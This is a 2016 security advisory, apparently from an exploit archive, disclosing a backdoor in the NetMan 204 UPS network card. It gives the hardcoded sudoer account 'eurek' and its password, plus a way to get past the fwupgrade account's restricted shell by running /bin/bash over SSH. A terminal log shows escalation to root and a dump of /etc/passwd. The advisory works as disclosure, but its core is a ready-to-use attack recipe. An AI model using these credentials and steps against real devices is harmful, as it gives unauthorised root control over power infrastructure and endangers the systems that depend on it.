NetMan 204 Backdoor Account

Risk: High
Local: No
Remote: Yes

NetMan 204 - Backdoor Account Author: Saeed reza Zamanian [penetrationtest @ Linkedin] Product: NetMan 204 Vendor: Product URL: Quick Reference Installation Manual : Date: 23 Sep 2016 About Product: ---------------------- The NetMan 204 network agent allows UPS directly connected over LAN 10/100 Mb connections to be managed using the main network communication protocols (TCP /IP , HTTP HTTPS, SSH, SNMPv1, SNMPv2 and SNMPv3). It is the ideal solution for the integration of UPS over Ethernet networks with Modbus/TCP and BACnet/IP protocols. It was developed to integrate UPS into medium-sized and large networks, to provide a high level of reliability in communication between the UPS and associated management systems. Vulnerability Report: ---------------------- The UPS Module has 3 default accounts, (admin,fwupgrade,user) , fwupgrade has a shell access to the device BUT if you try to get access to the shell a shell script closes your conection. to stop the shell script and avoid to terminate your connection you should , set your SSH client to execute "/bin/bash" after you logon the SSH. as a result your shell type will be changed to "/bin/bash" as you see below there is an account called "eurek" and ofcourse it's password also is "eurek". Since that "eurek" is a sudoer user you will get full access to the device. Enjoy It! login as: eurek eurek@'s password: Could not chdir to home directory /home/eurek: No such file or directory eurek@UPS:/$ id uid=1000(eurek) gid=1000(eurek) groups=1000(eurek),27(sudo) eurek@UPS:/$ sudo bash [sudo] password for eurek: root@UPS:/# id uid=0(root) gid=0(root) groups=0(root) root@UPS:/# login as: fwupgrade fwupgrade@'s password: fwupgrade@UPS:/home/fwupgrade$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin messagebus:x:102:104::/var/run/dbus:/bin/false eurek:x:1000:1000:eurek,,,:/home/eurek:/bin/bash postfix:x:103:106::/var/spool/postfix:/bin/false statd:x:104:65534::/var/lib/nfs:/bin/false pulse:x:105:110:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:106:112:RealtimeKit,,,:/proc:/bin/false admin:x:1001:1001:,,,:/home/./admin:/bin/bash fwupgrade:x:1002:1002:,,,:/home/./fwupgrade:/bin/bash user:x:1003:1003:,,,:/home/user:/bin/bash ftp:x:107:113:ftp daemon,,,:/srv/ftp:/bin/false fwupgrade@UPS:/home/fwupgrade$ # EOF

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top